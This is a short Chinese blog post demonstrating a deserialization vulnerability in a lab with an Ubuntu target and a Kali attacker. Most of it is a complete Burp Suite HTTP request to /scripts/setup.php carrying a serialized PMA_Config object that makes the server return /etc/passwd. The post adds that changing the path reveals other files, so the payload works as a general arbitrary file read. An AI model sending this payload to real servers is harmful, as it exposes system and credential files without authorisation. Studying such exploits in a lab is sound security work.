反序列化漏洞演示

1337163122

反序列化漏洞演示原创 yushao web安全工具库 今天
收录于话题
#安卓逆向1
#抓包1
这不是我想要的生活，我的心酸不可告人。。。
----  网易云热评
一、环境
小受：192.168.139.128 Ubuntu
小攻：192.168.139.133 Kali

二、打开BurpSuite将下面数据包内容复制到Repeater模块

1. POST /scripts/setup.php HTTP/1.1
   
2. Host: 192.168.139.128:8080
   
3. Accept-Encoding: gzip, deflate
   
4. Accept: */*
   
5. Accept-Language: en
   
6. User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
   
7. Connection: close
   
8. Content-Type: application/x-www-form-urlencoded
   
9. Content-Length: 80
   
10. action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

复制代码

​
​

三，点击发送，在响应包里可以看到/etc/passwd文件内容，通过修改该目录可以查看其它文件
​

1. 
   

复制代码